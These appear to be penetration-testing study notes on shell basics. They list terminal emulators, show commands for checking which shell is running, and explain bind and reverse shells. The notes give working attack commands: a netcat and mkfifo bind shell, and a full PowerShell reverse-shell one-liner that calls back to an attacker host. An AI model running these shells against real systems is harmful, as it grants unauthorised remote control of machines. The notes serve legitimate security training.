2 - Shell Basics - JA Smith

# Anatomy of Shell - command-line interfaces = a combination of the operating system, terminal emulator application, and the command language interpreter - command language interpreter = bash, ksh, zsh | **Terminal Emulator** | **Operating System** | | :------------------------------------------------------------- | :----------------------- | | [Windows Terminal](https://github.com/microsoft/terminal) | Windows | | [cmder](https://cmder.app/) | Windows | | [PuTTY](https://www.putty.org/) | Windows | | [kitty](https://sw.kovidgoyal.net/kitty/) | Windows, Linux and MacOS | | [Alacritty](https://github.com/alacritty/alacritty) | Windows, Linux and MacOS | | [xterm](https://invisible-island.net/xterm/) | Linux | | [GNOME Terminal](https://en.wikipedia.org/wiki/GNOME_Terminal) | Linux | | [MATE Terminal](https://github.com/mate-desktop/mate-terminal) | Linux | | [Konsole](https://konsole.kde.org/) | Linux | | [Terminal](https://en.wikipedia.org/wiki/Terminal_$macOS$) | MacOS | | [iTerm2](https://iterm2.com/) | MacOS | ## Shell Validation in BASH ```bash ps #shows running processes including one for the current terminal emulator env #shows which shell is bound to the SHELL variable uname -a #shows kernel, os, and archicteture info ``` ## Shell Validation in PowerShell ```powershell $PSVersionTable #shows PS version, OS, platform info ``` # Bind Shells - Kali host connects to a listener on the target - requires active listener on target as well as associated ip address and port ## Example with GNU Netcat (nc) on Server ```bash #setup listener on target nc -lvnp 7777 ``` ```bash #connect to listener from Kali host to establish a bind shell nc -nv <target_ip> 7777 ``` - this is *not* a proper shell, only a TCP session that can send messages form Hali host to target ## Example with Binding Bash Shell to TCP Session on Server ```bash #setup listener on target rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <target_ip> 7777 > /tmp/f ``` ```bash #connect to listener from Kali host to establish a bind shell nc -nv <target_ip> 7777 ``` # Reverse Shells - Connect to listener on Kali host from target - Requires listener on Kali host and target to execute a payload to reach out to listener ## Example RevShell from Windows ```bash #setup listener on Kali host sudo nc -lvnp 443 ``` ```powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<kali_host_ip>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ```cmd-session powershell -nop -c ``` ```